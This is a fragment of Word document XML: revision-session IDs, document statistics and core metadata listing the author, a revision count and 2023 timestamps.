    <w:rsid w:val="00ED3145"/>
    <w:rsid w:val="00EE45EA"/>
    <w:rsid w:val="00F107ED"/>
    <w:rsid w:val="00F67BF2"/>
    <w:rsid w:val="00F74DEB"/>
    <w:rsid w:val="00F76EFA"/>
    <w:rsid w:val="00F94F35"/>
    <w:rsid w:val="00FA1275"/>
    <w:rsid w:val="00FA6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71DD4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F7DC8B49-4862-432B-89AC-97D444152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76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20</Pages>
  <Words>1544</Words>
  <Characters>8805</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>73</Lines>
  <Paragraphs>20</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>10329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Vikramadithya Ivaturi</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Vikramadithya Ivaturi</cp:lastModifiedBy>
  <cp:revision>102</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-03-12T21:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-13T02:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>